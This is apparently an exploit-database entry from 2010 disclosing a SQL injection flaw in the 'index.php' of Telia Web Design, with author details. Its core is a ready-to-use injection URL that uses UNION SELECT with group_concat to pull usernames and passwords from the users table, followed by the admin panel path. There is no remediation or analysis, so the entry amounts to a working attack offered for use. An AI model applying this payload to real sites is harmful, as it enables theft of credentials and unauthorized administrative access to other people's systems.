Telia Web Design - 'index.php' SQL Injection

Author: CoBRa_21
type: webapps
platform: php
port: 
date_added: 2010-05-23 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

-------------------------------------------------------------------------------------------

Telia Web Design (index.php) SQL Injection Vulnerability

-------------------------------------------------------------------------------------------

Author: CoBRa_21

Mail: uyku_cu@windowslive.com

Script Home: http://www.telia.co.gr/

-------------------------------------------------------------------------------------------

Sql Injection:

http://localhost/[path]/index.php?module=content&action=article&id=-80/**/union/**/select/**/group_concat(username,0x3a,password),2/**/from/**/users


Admin Panel

http://localhost/[path]/admin
-------------------------------------------------------------------------------------------